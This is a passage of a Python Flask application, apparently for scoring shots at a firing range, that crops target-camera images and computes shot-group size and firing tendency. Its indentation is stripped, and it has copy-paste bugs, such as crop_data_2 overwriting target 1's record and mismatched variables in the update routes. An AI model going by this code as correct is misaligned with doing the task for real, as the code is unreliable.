t1code="T"
t2code="L"
elif firt_x <0 and firt_y <0:
t1="Bottom"
t2="Left"
t1code="B"
t2code="L"
else:
t1="Bottom"
t2="Right"
t1code="B"
t2code="R"
if(isbullseye):
ftcode="Center"
fttext = "Center "+"("+str(firt_y)+" , "+str(firt_x)+")"
else:
ftcode=t1code+t2code
fttext = t1+"("+str(firt_y)+") "+t2+"("+str(firt_x)+")"
return fttext,ftcode
def grouping_length(xt,yt,x ,y):
d = {}
counter=0
for i in range(len(x)):
for j in range(len(x)):
d[counter]=distance(x[j],y[j],x[i],y[i])
counter+=1
maxdist = 0
for key in d.keys():
if(maxdist<d[key]):
maxdist= d[key]
maxdist_inch = pixeltoinch(maxdist)
return maxdist_inch
def distance (x1,y1,x,y):
dist = 0
xdist = x1 - x
ydist = y1 - y
dist = math.sqrt(xdist**2 + ydist**2)
return dist
def pixeltoinch(maxdist):
inch = (34/2000 *1.0)*maxdist
return np.round(inch,1)
def getresulttext(gpinch):
print(type(gpinch),file=sys.stderr)
print(gpinch,file=sys.stderr)
if gpinch <=10:
return "Pass"
else:
return "W/O"
@app.route('/previous_page_edit_1/')
def previous_page_edit_1():
return render_template('pages/image_edit_previous_1.html')
@app.route('/previous_page_edit_5/')
def previous_page_edit_5():
return render_template('pages/image_edit_previous_5.html')
@app.route('/crop_data_1', methods=['GET', 'POST'])
def crop_data_1():
img = Image.open("E:/FRAS Windows/FRAS_production/static/raw_image/CAMERA1_1.JPG")
if request.method == "POST":
data=request.get_json()
point_1=data['data1'][0]
point_2=data['data2'][0]
point_3=data['data3'][0]
point_4=data['data4'][0]
print(point_1,file=sys.stderr)
print(point_2,file=sys.stderr)
print(point_3,file=sys.stderr)
print(point_4,file=sys.stderr)
points=[]
points.append(point_1)
points.append(point_2)
points.append(point_3)
points.append(point_4)
temp_points = []
for p in points:
temp_points.append(p)
l=99999
left1=None
for p in temp_points:
if l > p[0]:
l=p[0]
left1 = p
temp_points2 = []
for p in temp_points:
if(p[0]!=left1[0] and p[1]!=left1[1]):
temp_points2.append(p)
l2=99999
left2=None
for p in temp_points2:
if l2 > p[0]:
l2=p[0]
left2 = p
left = None
print("left1,left2",file=sys.stderr)
print(left1,left2,file=sys.stderr)
if left1[1]>left2[1]:
left = left1
else:
left = left2
r=-1000
right1=None
for p in points:
if r < p[0]:
r = p[0]
right1 = p
temp_points3 = []
for p in points:
if(p[0]!=right1[0] and p[1]!=right1[1]):
temp_points3.append(p)
r2=-1000
right2=None
for p in temp_points3:
if r2 < p[0]:
r2=p[0]
right2 = p
right = None
if right1[1]<right2[1]:
right = right1
else:
right = right2
print("right1,right2",file=sys.stderr)
print(right1,right2,file=sys.stderr)
print("left,right",file=sys.stderr)
print(left,right,file=sys.stderr)
x1=int(left[0])
if(x1>5470):
x1=5470
y1=int(3648.0-(left[1]))
if(y1<0):
y1=0
x2=int(right[0])+80
if(x2>5470):
x2=5470
y2=int(3648.0-(right[1]))
if(y2<0):
y2=0
x1=x1+50
y1=y1+50
x2=x2+50
y2=y2+50
print("x1,y1,x2, y2",file=sys.stderr)
print(x1,y1,x2, y2,file=sys.stderr)
img2 = img.crop((x1, y1, x2, y2))
resize_image=img2.resize((2000, 2000), Image.ANTIALIAS)
resize_image.save('E:/FRAS Windows/FRAS_production/static/img_dump/1.jpg', 'JPEG')
image_png=Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/1.jpg')
#os.remove("E:/FRAS_production/static/img_dump/1.png")
image_png.save('E:/FRAS Windows/FRAS_production/static/img_dump/1.png')
sth = db.session.query(Crop).filter(Crop.target_no==1).scalar()
if sth is None:
crop =Crop(
target_no=1,
x1=x1,
y1=y1,
x2=x2,
y2=y2
)
db.session.add(crop)
db.session.commit()
else:
db.session.query(Crop).filter(Crop.target_no==1).delete()
db.session.commit()
crop =Crop(
target_no=1,
x1=x1,
y1=y1,
x2=x2,
y2=y2
)
db.session.add(crop)
db.session.commit()
return redirect(url_for('previous_page_edit_1'))
@app.route('/calibration_1', methods=['GET', 'POST'])
def calibration_1():
data = db.session.query(Crop).filter_by(target_no=1).scalar()
print(data.target_no,file=sys.stderr)
print(data.x1,file=sys.stderr)
x1=data.x1
y1=data.y1
x2=data.x2
y2=data.y2
img = Image.open('E:/FRAS Windows/FRAS_production/static/raw_image/CAMERA1_1.JPG')
img2 = img.crop((x1, y1, x2, y2))
resize_image=img2.resize((2000, 2000), Image.ANTIALIAS)
resize_image.save('E:/FRAS Windows/FRAS_production/static/img_dump/1.jpg', 'JPEG')
image_png=Image.open("E:/FRAS Windows/FRAS_production/static/img_dump/1.jpg")
image_png.save("E:/FRAS Windows/FRAS_production/static/img_dump/1.png")
return redirect(url_for('previous_page_edit_1'))
@app.route('/calibration_2', methods=['GET', 'POST'])
def calibration_2():
data = db.session.query(Crop).filter_by(target_no=2).scalar()
print(data.target_no,file=sys.stderr)
print(data.x1,file=sys.stderr)
x1=data.x1
y1=data.y1
x2=data.x2
y2=data.y2
img = Image.open('E:/FRAS Windows/FRAS_production/static/raw_image/CAMERA2_2.JPG')
img2 = img.crop((x1, y1, x2, y2))
resize_image=img2.resize((2000, 2000), Image.ANTIALIAS)
resize_image.save('E:/FRAS Windows/FRAS_production/static/img_dump/2.jpg', 'JPEG')
image_png=Image.open("E:/FRAS Windows/FRAS_production/static/img_dump/2.jpg")
image_png.save("E:/FRAS Windows/FRAS_production/static/img_dump/2png")
return redirect(url_for('previous_page_edit_1'))
@app.route('/crop_data_2', methods=['GET', 'POST'])
def crop_data_2():
img = Image.open("E:/FRAS Windows/FRAS_production/static/raw_image/CAMERA2_2.JPG")
if request.method == "POST":
data=request.get_json()
point_1=data['data1'][0]
point_2=data['data2'][0]
point_3=data['data3'][0]
point_4=data['data4'][0]
print(point_1,file=sys.stderr)
print(point_2,file=sys.stderr)
print(point_3,file=sys.stderr)
print(point_4,file=sys.stderr)
points=[]
points.append(point_1)
points.append(point_2)
points.append(point_3)
points.append(point_4)
temp_points = []
for p in points:
temp_points.append(p)
l=99999
left1=None
for p in temp_points:
if l > p[0]:
l=p[0]
left1 = p
temp_points2 = []
for p in temp_points:
if(p[0]!=left1[0] and p[1]!=left1[1]):
temp_points2.append(p)
l2=99999
left2=None
for p in temp_points2:
if l2 > p[0]:
l2=p[0]
left2 = p
left = None
print("left1,left2",file=sys.stderr)
print(left1,left2,file=sys.stderr)
if left1[1]>left2[1]:
left = left1
else:
left = left2
r=-1000
right1=None
for p in points:
if r < p[0]:
r = p[0]
right1 = p
temp_points3 = []
for p in points:
if(p[0]!=right1[0] and p[1]!=right1[1]):
temp_points3.append(p)
r2=-1000
right2=None
for p in temp_points3:
if r2 < p[0]:
r2=p[0]
right2 = p
right = None
if right1[1]<right2[1]:
right = right1
else:
right = right2
print("right1,right2",file=sys.stderr)
print(right1,right2,file=sys.stderr)
print("left,right",file=sys.stderr)
print(left,right,file=sys.stderr)
x1=int(left[0])
if(x1>5470):
x1=5470
y1=int(3648.0-(left[1]))
if(y1<0):
y1=0
x2=int(right[0])+80
if(x2>5470):
x2=5470
y2=int(3648.0-(right[1]))
if(y2<0):
y2=0
x1=x1+50
y1=y1+50
x2=x2+50
y2=y2+50
print("x1,y1,x2, y2",file=sys.stderr)
print(x1,y1,x2, y2,file=sys.stderr)
img2 = img.crop((x1, y1, x2, y2))
resize_image=img2.resize((2000, 2000), Image.ANTIALIAS)
resize_image.save('E:/FRAS Windows/FRAS_production/static/img_dump/2.jpg', 'JPEG')
image_png=Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/2.jpg')
#os.remove("E:/FRAS_production/static/img_dump/1.png")
image_png.save('E:/FRAS Windows/FRAS_production/static/img_dump/2.png')
sth = db.session.query(Crop).filter(Crop.target_no==1).scalar()
if sth is None:
crop =Crop(
target_no=2,
x1=x1,
y1=y1,
x2=x2,
y2=y2
)
db.session.add(crop)
db.session.commit()
else:
db.session.query(Crop).filter(Crop.target_no==1).delete()
db.session.commit()
crop =Crop(
target_no=2,
x1=x1,
y1=y1,
x2=x2,
y2=y2
)
db.session.add(crop)
db.session.commit()
return redirect(url_for('previous_page_edit_1'))
@app.route('/crop_data_3', methods=['GET', 'POST'])
def crop_data_3():
img = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/raw_image/CAMERA3_3.JPG")
if request.method == "POST":
data=request.get_json()
point_1=data['data1'][0]
point_2=data['data2'][0]
point_3=data['data3'][0]
point_4=data['data4'][0]
print(point_1,file=sys.stderr)
print(point_2,file=sys.stderr)
print(point_3,file=sys.stderr)
print(point_4,file=sys.stderr)
points=[]
points.append(point_1)
points.append(point_2)
points.append(point_3)
points.append(point_4)
temp_points = []
for p in points:
temp_points.append(p)
l=99999
left1=None
for p in temp_points:
if l > p[0]:
l=p[0]
left1 = p
temp_points2 = []
for p in temp_points:
if(p[0]!=left1[0] and p[1]!=left1[1]):
temp_points2.append(p)
l2=99999
left2=None
for p in temp_points2:
if l2 > p[0]:
l2=p[0]
left2 = p
left = None
print("left1,left2",file=sys.stderr)
print(left1,left2,file=sys.stderr)
if left1[1]>left2[1]:
left = left1
else:
left = left2
r=-1000
right1=None
for p in points:
if r < p[0]:
r = p[0]
right1 = p
temp_points3 = []
for p in points:
if(p[0]!=right1[0] and p[1]!=right1[1]):
temp_points3.append(p)
r2=-1000
right2=None
for p in temp_points3:
if r2 < p[0]:
r2=p[0]
right2 = p
right = None
if right1[1]<right2[1]:
right = right1
else:
right = right2
print("right1,right2",file=sys.stderr)
print(right1,right2,file=sys.stderr)
print("left,right",file=sys.stderr)
print(left,right,file=sys.stderr)
x1=int(left[0])
if(x1>5470):
x1=5470
y1=int(3648.0-(left[1]))
if(y1<0):
y1=0
x2=int(right[0])+80
if(x2>5470):
x2=5470
y2=int(3648.0-(right[1]))
if(y2<0):
y2=0
print("x1,y1,x2, y2",file=sys.stderr)
print(x1,y1,x2, y2,file=sys.stderr)
img2 = img.crop((x1, y1, x2, y2))
resize_image=img2.resize((2000, 2000), Image.ANTIALIAS)
resize_image.save('/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/3.jpg', 'JPEG')
image_png=Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/3.jpg")
image_png.save("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/3.png")
return redirect(url_for('previous_page_edit_1'))
@app.route('/crop_data_4', methods=['GET', 'POST'])
def crop_data_4():
img = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/raw_image/CAMERA4_4.JPG")
if request.method == "POST":
data=request.get_json()
point_1=data['data1'][0]
point_2=data['data2'][0]
point_3=data['data3'][0]
point_4=data['data4'][0]
print(point_1,file=sys.stderr)
print(point_2,file=sys.stderr)
print(point_3,file=sys.stderr)
print(point_4,file=sys.stderr)
points=[]
points.append(point_1)
points.append(point_2)
points.append(point_3)
points.append(point_4)
temp_points = []
for p in points:
temp_points.append(p)
l=99999
left1=None
for p in temp_points:
if l > p[0]:
l=p[0]
left1 = p
temp_points2 = []
for p in temp_points:
if(p[0]!=left1[0] and p[1]!=left1[1]):
temp_points2.append(p)
l2=99999
left2=None
for p in temp_points2:
if l2 > p[0]:
l2=p[0]
left2 = p
left = None
print("left1,left2",file=sys.stderr)
print(left1,left2,file=sys.stderr)
if left1[1]>left2[1]:
left = left1
else:
left = left2
r=-1000
right1=None
for p in points:
if r < p[0]:
r = p[0]
right1 = p
temp_points3 = []
for p in points:
if(p[0]!=right1[0] and p[1]!=right1[1]):
temp_points3.append(p)
r2=-1000
right2=None
for p in temp_points3:
if r2 < p[0]:
r2=p[0]
right2 = p
right = None
if right1[1]<right2[1]:
right = right1
else:
right = right2
print("right1,right2",file=sys.stderr)
print(right1,right2,file=sys.stderr)
print("left,right",file=sys.stderr)
print(left,right,file=sys.stderr)
x1=int(left[0])
if(x1>5470):
x1=5470
y1=int(3648.0-(left[1]))
if(y1<0):
y1=0
x2=int(right[0])+80
if(x2>5470):
x2=5470
y2=int(3648.0-(right[1]))
if(y2<0):
y2=0
print("x1,y1,x2, y2",file=sys.stderr)
print(x1,y1,x2, y2,file=sys.stderr)
img2 = img.crop((x1, y1, x2, y2))
resize_image=img2.resize((2000, 2000), Image.ANTIALIAS)
resize_image.save('/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/4.jpg', 'JPEG')
image_png=Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/4.jpg")
image_png.save("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/4.png")
return redirect(url_for('previous_page_edit_1'))
@app.route('/crop_data_5', methods=['GET', 'POST'])
def crop_data_5():
img = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/raw_image/CAMERA5_5.JPG")
if request.method == "POST":
data=request.get_json()
point_1=data['data1'][0]
point_2=data['data2'][0]
point_3=data['data3'][0]
point_4=data['data4'][0]
print(point_1,file=sys.stderr)
print(point_2,file=sys.stderr)
print(point_3,file=sys.stderr)
print(point_4,file=sys.stderr)
points=[]
points.append(point_1)
points.append(point_2)
points.append(point_3)
points.append(point_4)
temp_points = []
for p in points:
temp_points.append(p)
l=99999
left1=None
for p in temp_points:
if l > p[0]:
l=p[0]
left1 = p
temp_points2 = []
for p in temp_points:
if(p[0]!=left1[0] and p[1]!=left1[1]):
temp_points2.append(p)
l2=99999
left2=None
for p in temp_points2:
if l2 > p[0]:
l2=p[0]
left2 = p
left = None
print("left1,left2",file=sys.stderr)
print(left1,left2,file=sys.stderr)
if left1[1]>left2[1]:
left = left1
else:
left = left2
r=-1000
right1=None
for p in points:
if r < p[0]:
r = p[0]
right1 = p
temp_points3 = []
for p in points:
if(p[0]!=right1[0] and p[1]!=right1[1]):
temp_points3.append(p)
r2=-1000
right2=None
for p in temp_points3:
if r2 < p[0]:
r2=p[0]
right2 = p
right = None
if right1[1]<right2[1]:
right = right1
else:
right = right2
print("right1,right2",file=sys.stderr)
print(right1,right2,file=sys.stderr)
print("left,right",file=sys.stderr)
print(left,right,file=sys.stderr)
x1=int(left[0])
if(x1>5470):
x1=5470
y1=int(3648.0-(left[1]))
if(y1<0):
y1=0
x2=int(right[0])+80
if(x2>5470):
x2=5470
y2=int(3648.0-(right[1]))
if(y2<0):
y2=0
print("x1,y1,x2, y2",file=sys.stderr)
print(x1,y1,x2, y2,file=sys.stderr)
img2 = img.crop((x1, y1, x2, y2))
resize_image=img2.resize((2000, 2000), Image.ANTIALIAS)
resize_image.save('/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/5.jpg', 'JPEG')
image_png=Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/5.jpg")
image_png.save("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/5.png")
return redirect(url_for('previous_page_edit_2'))
@app.route('/crop_data_6', methods=['GET', 'POST'])
def crop_data_6():
img = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/raw_image/CAMERA6_6.JPG")
if request.method == "POST":
data=request.get_json()
point_1=data['data1'][0]
point_2=data['data2'][0]
point_3=data['data3'][0]
point_4=data['data4'][0]
print(point_1,file=sys.stderr)
print(point_2,file=sys.stderr)
print(point_3,file=sys.stderr)
print(point_4,file=sys.stderr)
points=[]
points.append(point_1)
points.append(point_2)
points.append(point_3)
points.append(point_4)
temp_points = []
for p in points:
temp_points.append(p)
l=99999
left1=None
for p in temp_points:
if l > p[0]:
l=p[0]
left1 = p
temp_points2 = []
for p in temp_points:
if(p[0]!=left1[0] and p[1]!=left1[1]):
temp_points2.append(p)
l2=99999
left2=None
for p in temp_points2:
if l2 > p[0]:
l2=p[0]
left2 = p
left = None
print("left1,left2",file=sys.stderr)
print(left1,left2,file=sys.stderr)
if left1[1]>left2[1]:
left = left1
else:
left = left2
r=-1000
right1=None
for p in points:
if r < p[0]:
r = p[0]
right1 = p
temp_points3 = []
for p in points:
if(p[0]!=right1[0] and p[1]!=right1[1]):
temp_points3.append(p)
r2=-1000
right2=None
for p in temp_points3:
if r2 < p[0]:
r2=p[0]
right2 = p
right = None
if right1[1]<right2[1]:
right = right1
else:
right = right2
print("right1,right2",file=sys.stderr)
print(right1,right2,file=sys.stderr)
print("left,right",file=sys.stderr)
print(left,right,file=sys.stderr)
x1=int(left[0])
if(x1>5470):
x1=5470
y1=int(3648.0-(left[1]))
if(y1<0):
y1=0
x2=int(right[0])+80
if(x2>5470):
x2=5470
y2=int(3648.0-(right[1]))
if(y2<0):
y2=0
print("x1,y1,x2, y2",file=sys.stderr)
print(x1,y1,x2, y2,file=sys.stderr)
img2 = img.crop((x1, y1, x2, y2))
resize_image=img2.resize((2000, 2000), Image.ANTIALIAS)
resize_image.save('/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/6.jpg', 'JPEG')
image_png=Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/6.jpg")
image_png.save("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/6.png")
return redirect(url_for('previous_page_edit_2'))
@app.route('/crop_data_7', methods=['GET', 'POST'])
def crop_data_7():
img = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/raw_image/CAMERA7_7.JPG")
if request.method == "POST":
data=request.get_json()
point_1=data['data1'][0]
point_2=data['data2'][0]
point_3=data['data3'][0]
point_4=data['data4'][0]
print(point_1,file=sys.stderr)
print(point_2,file=sys.stderr)
print(point_3,file=sys.stderr)
print(point_4,file=sys.stderr)
points=[]
points.append(point_1)
points.append(point_2)
points.append(point_3)
points.append(point_4)
temp_points = []
for p in points:
temp_points.append(p)
l=99999
left1=None
for p in temp_points:
if l > p[0]:
l=p[0]
left1 = p
temp_points2 = []
for p in temp_points:
if(p[0]!=left1[0] and p[1]!=left1[1]):
temp_points2.append(p)
l2=99999
left2=None
for p in temp_points2:
if l2 > p[0]:
l2=p[0]
left2 = p
left = None
print("left1,left2",file=sys.stderr)
print(left1,left2,file=sys.stderr)
if left1[1]>left2[1]:
left = left1
else:
left = left2
r=-1000
right1=None
for p in points:
if r < p[0]:
r = p[0]
right1 = p
temp_points3 = []
for p in points:
if(p[0]!=right1[0] and p[1]!=right1[1]):
temp_points3.append(p)
r2=-1000
right2=None
for p in temp_points3:
if r2 < p[0]:
r2=p[0]
right2 = p
right = None
if right1[1]<right2[1]:
right = right1
else:
right = right2
print("right1,right2",file=sys.stderr)
print(right1,right2,file=sys.stderr)
print("left,right",file=sys.stderr)
print(left,right,file=sys.stderr)
x1=int(left[0])
if(x1>5470):
x1=5470
y1=int(3648.0-(left[1]))
if(y1<0):
y1=0
x2=int(right[0])+80
if(x2>5470):
x2=5470
y2=int(3648.0-(right[1]))
if(y2<0):
y2=0
print("x1,y1,x2, y2",file=sys.stderr)
print(x1,y1,x2, y2,file=sys.stderr)
img2 = img.crop((x1, y1, x2, y2))
resize_image=img2.resize((2000, 2000), Image.ANTIALIAS)
resize_image.save('/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/7.jpg', 'JPEG')
image_png=Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/7.jpg")
image_png.save("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/7.png")
return redirect(url_for('previous_page_edit_2'))
@app.route('/crop_data_8', methods=['GET', 'POST'])
def crop_data_8():
img = Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/raw_image/CAMERA8_8.JPG")
if request.method == "POST":
data=request.get_json()
point_1=data['data1'][0]
point_2=data['data2'][0]
point_3=data['data3'][0]
point_4=data['data4'][0]
print(point_1,file=sys.stderr)
print(point_2,file=sys.stderr)
print(point_3,file=sys.stderr)
print(point_4,file=sys.stderr)
points=[]
points.append(point_1)
points.append(point_2)
points.append(point_3)
points.append(point_4)
temp_points = []
for p in points:
temp_points.append(p)
l=99999
left1=None
for p in temp_points:
if l > p[0]:
l=p[0]
left1 = p
temp_points2 = []
for p in temp_points:
if(p[0]!=left1[0] and p[1]!=left1[1]):
temp_points2.append(p)
l2=99999
left2=None
for p in temp_points2:
if l2 > p[0]:
l2=p[0]
left2 = p
left = None
print("left1,left2",file=sys.stderr)
print(left1,left2,file=sys.stderr)
if left1[1]>left2[1]:
left = left1
else:
left = left2
r=-1000
right1=None
for p in points:
if r < p[0]:
r = p[0]
right1 = p
temp_points3 = []
for p in points:
if(p[0]!=right1[0] and p[1]!=right1[1]):
temp_points3.append(p)
r2=-1000
right2=None
for p in temp_points3:
if r2 < p[0]:
r2=p[0]
right2 = p
right = None
if right1[1]<right2[1]:
right = right1
else:
right = right2
print("right1,right2",file=sys.stderr)
print(right1,right2,file=sys.stderr)
print("left,right",file=sys.stderr)
print(left,right,file=sys.stderr)
x1=int(left[0])
if(x1>5470):
x1=5470
y1=int(3648.0-(left[1]))
if(y1<0):
y1=0
x2=int(right[0])+80
if(x2>5470):
x2=5470
y2=int(3648.0-(right[1]))
if(y2<0):
y2=0
print("x1,y1,x2, y2",file=sys.stderr)
print(x1,y1,x2, y2,file=sys.stderr)
img2 = img.crop((x1, y1, x2, y2))
resize_image=img2.resize((2000, 2000), Image.ANTIALIAS)
resize_image.save('/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/8.jpg', 'JPEG')
image_png=Image.open("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/8.jpg")
image_png.save("/Users/wasifaahmed/Documents/FRAS/FRAS_production/static/img_dump/8.png")
return redirect(url_for('previous_page_edit_2'))
@app.route('/test', methods=['GET', 'POST'])
def update():
mp=0
gp_1=0
tyf=0
txf=0
f_1=0
xmpi_1=0
ympi_1=0
j_x=None
j_y=None
j_mp=None
up_res_1=None
mp_inch = []
x1=[]
y1=[]
u_fir_tendency_txt=None
u_fir_tendency_code=None
if request.method == "POST":
data1 = request.get_json()
tx1 =data1['x1']
for le in tx1:
x1.append(le[0])
ty1 = data1['y1']
for le in ty1:
y1.append(le[0])
points = data1['points']
mp = mpi(1,points).tolist()
mp_inch.append(pixeltoinch(mp[0][0]))
mp_inch.append(pixeltoinch(mp[0][1]))
tmpi=mpi(1,points)
#print("Printing from UPDATE...", file=sys.stderr)
#print(tmpi, file=sys.stderr)
xmpi_1 = tmpi[0][0]
ympi_1 = tmpi[0][1]
session['tmpi']=mp
f_1,txf_list,tyf_list =firing_tendancy(1000, 1000 , xmpi_1, ympi_1)
txf=txf_list
tyf=tyf_list
j_x=pd.Series(txf).to_json(orient='values')
j_y=pd.Series(tyf).to_json(orient='values')
print("this is inside upadate",file=sys.stderr)
print(txf,file=sys.stderr)
gp_1 = grouping_length(0 , 0 , x1 , y1)
up_res_1=getresulttext(gp_1)
u_fir_tendency_txt,u_fir_tendency_code = getfiringtendencytext(f_1,txf_list,tyf_list)
session['x1'] = data1['x1']
session ['y1'] = data1['y1']
print("session.get('x1')",file=sys.stderr)
print(session.get('x1'),file=sys.stderr)
session['tf_u_1']=f_1
session['gp_u_1']=gp_1
session ['res_u_1']=up_res_1
session ['tfirer_x1']=u_fir_tendency_txt
session ['tfirer_y1']=u_fir_tendency_code
session ['tfirer_x1_f']=txf
session ['tfirer_y1_f']=tyf
return jsonify(mp = mp_inch ,
gp_1=gp_1,
ten_yu=j_y,
ten_xu=j_x,
result=up_res_1,
u_fir_tendency=u_fir_tendency_txt
)
@app.route('/test_2', methods=['GET', 'POST'])
def update_2():
mp_2=0
gp_2=0
tyf_2=0
txf_2=0
f_2=0
xmpi_2=0
ympi_2=0
j_x_2=None
j_y_2=None
j_mp_2=None
up_res_2=None
mp_inch_2 = []
x2=[]
y2=[]
u_fir_tendency_txt_2=None
u_fir_tendency_code_2=None
if request.method == "POST":
data1 = request.get_json()
tx2 =data1['x1']
for le in tx2:
x2.append(le[0])
print("x2",file=sys.stderr)
print(x2,file=sys.stderr)
ty2 = data1['y1']
for le in ty2:
y2.append(le[0])
points = data1['points']
mp = mpi(1,points).tolist()
mp_inch_2.append(pixeltoinch(mp[0][0]))
mp_inch_2.append(pixeltoinch(mp[0][1]))
tmpi_2=mpi(1,points)
#print(tmpi, file=sys.stderr)
xmpi_1 = tmpi_2[0][0]
ympi_1 = tmpi_2[0][1]
session['tmpi_2']=mp
f_1,txf_list,tyf_list =firing_tendancy(1000, 1000 , xmpi_1, ympi_1)
txf_2=txf_list
tyf_2=tyf_list
j_x_2=pd.Series(txf_2).to_json(orient='values')
j_y_2=pd.Series(tyf_2).to_json(orient='values')
print("calling from update_2" ,file=sys.stderr)
print(txf_2,file=sys.stderr)
gp_2 = grouping_length(0 , 0 , x2 , y2)
up_res_2=getresulttext(gp_2)
u_fir_tendency_txt_2,u_fir_tendency_code_2 = getfiringtendencytext(f_2,txf_list,tyf_list)
session['x2'] = data1['x1']
print(j_x_2, file=sys.stderr)
session ['y2'] = data1['y1']
session['tf_u_2']=f_1
session['gp_u_2']=gp_2
session ['res_u_2']=up_res_2
session ['tfirer_x2']=u_fir_tendency_txt_2
session ['tfirer_y2']=u_fir_tendency_code_2
session ['tfirer_x1_f']=txf_2
session ['tfirer_y1_f']=tyf_2
return jsonify(mp = mp_inch_2 ,
gp_1=gp_2,
ten_yu=j_y_2,
ten_xu=j_x_2,
result=up_res_2,
u_fir_tendency=u_fir_tendency_txt_2
)
@app.route('/test_3', methods=['GET', 'POST'])
def update_3():
mp_2=0
gp_2=0
tyf_2=0
txf_2=0
f_2=0
xmpi_2=0
ympi_2=0
j_x_2=None
j_y_2=None
j_mp_2=None
up_res_2=None
mp_inch_2 = []
x2=[]
y2=[]
u_fir_tendency_txt_2=None
u_fir_tendency_code_2=None
if request.method == "POST":
data1 = request.get_json()
tx2 =data1['x1']
for le in tx2:
x2.append(le[0])
print("x2",file=sys.stderr)
print(x2,file=sys.stderr)
ty2 = data1['y1']
for le in ty2:
y2.append(le[0])
points = data1['points']
mp = mpi(1,points).tolist()
mp_inch_2.append(pixeltoinch(mp[0][0]))
mp_inch_2.append(pixeltoinch(mp[0][1]))
tmpi_2=mpi(1,points)
#print(tmpi, file=sys.stderr)
xmpi_1 = tmpi_2[0][0]
ympi_1 = tmpi_2[0][1]
session['tmpi_2']=mp
f_1,txf_list,tyf_list =firing_tendancy(1000, 1000 , xmpi_1, ympi_1)
txf_2=txf_list
tyf_2=tyf_list
j_x_2=pd.Series(txf_2).to_json(orient='values')
j_y_2=pd.Series(tyf_2).to_json(orient='values')
print("calling from update_2" ,file=sys.stderr)
print(txf_2,file=sys.stderr)
gp_2 = grouping_length(0 , 0 , x2 , y2)
up_res_2=getresulttext(gp_2)
u_fir_tendency_txt_2,u_fir_tendency_code_2 = getfiringtendencytext(f_2,txf_list,tyf_list)
session['x2'] = data1['x1']
print(j_x_2, file=sys.stderr)
session ['y2'] = data1['y1']
session['tf_u_2']=f_1
session['gp_u_2']=gp_2
session ['res_u_2']=up_res_2
session ['tfirer_x2']=u_fir_tendency_txt_2
session ['tfirer_y2']=u_fir_tendency_code_2
session ['tfirer_x1_f']=txf_2
session ['tfirer_y1_f']=tyf_2
return jsonify(mp = mp_inch_2 ,
gp_1=gp_2,
ten_yu=j_y_2,
ten_xu=j_x_2,
result=up_res_2,
u_fir_tendency=u_fir_tendency_txt_2
)
@app.route('/test_4', methods=['GET', 'POST'])
def update_4():
mp_2=0
gp_2=0
tyf_2=0
txf_2=0
f_2=0
xmpi_2=0
ympi_2=0
j_x_2=None
j_y_2=None
j_mp_2=None
up_res_2=None
mp_inch_2 = []
x2=[]
y2=[]
u_fir_tendency_txt_2=None
u_fir_tendency_code_2=None
if request.method == "POST":
data1 = request.get_json()
tx2 =data1['x1']
for le in tx2:
x2.append(le[0])
print("x2",file=sys.stderr)
print(x2,file=sys.stderr)
ty2 = data1['y1']
for le in ty2:
y2.append(le[0])
points = data1['points']
mp = mpi(1,points).tolist()
mp_inch_2.append(pixeltoinch(mp[0][0]))
mp_inch_2.append(pixeltoinch(mp[0][1]))
tmpi_2=mpi(1,points)
#print(tmpi, file=sys.stderr)
xmpi_1 = tmpi_2[0][0]
ympi_1 = tmpi_2[0][1]
session['tmpi_2']=mp
f_1,txf_list,tyf_list =firing_tendancy(1000, 1000 , xmpi_1, ympi_1)
txf_2=txf_list
tyf_2=tyf_list
j_x_2=pd.Series(txf_2).to_json(orient='values')
j_y_2=pd.Series(tyf_2).to_json(orient='values')
print("calling from update_2" ,file=sys.stderr)
print(txf_2,file=sys.stderr)
gp_2 = grouping_length(0 , 0 , x2 , y2)
up_res_2=getresulttext(gp_2)
u_fir_tendency_txt_2,u_fir_tendency_code_2 = getfiringtendencytext(f_2,txf_list,tyf_list)
session['x2'] = data1['x1']
print(j_x_2, file=sys.stderr)
session ['y2'] = data1['y1']
session['tf_u_2']=f_1
session['gp_u_2']=gp_2
session ['res_u_2']=up_res_2
session ['tfirer_x2']=u_fir_tendency_txt_2
session ['tfirer_y2']=u_fir_tendency_code_2
session ['tfirer_x1_f']=txf_2
session ['tfirer_y1_f']=tyf_2
return jsonify(mp = mp_inch_2 ,
gp_1=gp_2,
ten_yu=j_y_2,
ten_xu=j_x_2,
result=up_res_2,
u_fir_tendency=u_fir_tendency_txt_2
)
@app.route('/test_5', methods=['GET', 'POST'])
def update_5():
mp_2=0
gp_2=0
tyf_2=0
txf_2=0
f_2=0
xmpi_2=0
ympi_2=0
j_x_2=None
j_y_2=None
j_mp_2=None
up_res_2=None
mp_inch_2 = []
x2=[]
y2=[]
u_fir_tendency_txt_2=None
u_fir_tendency_code_2=None
if request.method == "POST":
data1 = request.get_json()
tx2 =data1['x1']
for le in tx2:
x2.append(le[0])
print("x2",file=sys.stderr)
print(x2,file=sys.stderr)
ty2 = data1['y1']
for le in ty2:
y2.append(le[0])
points = data1['points']
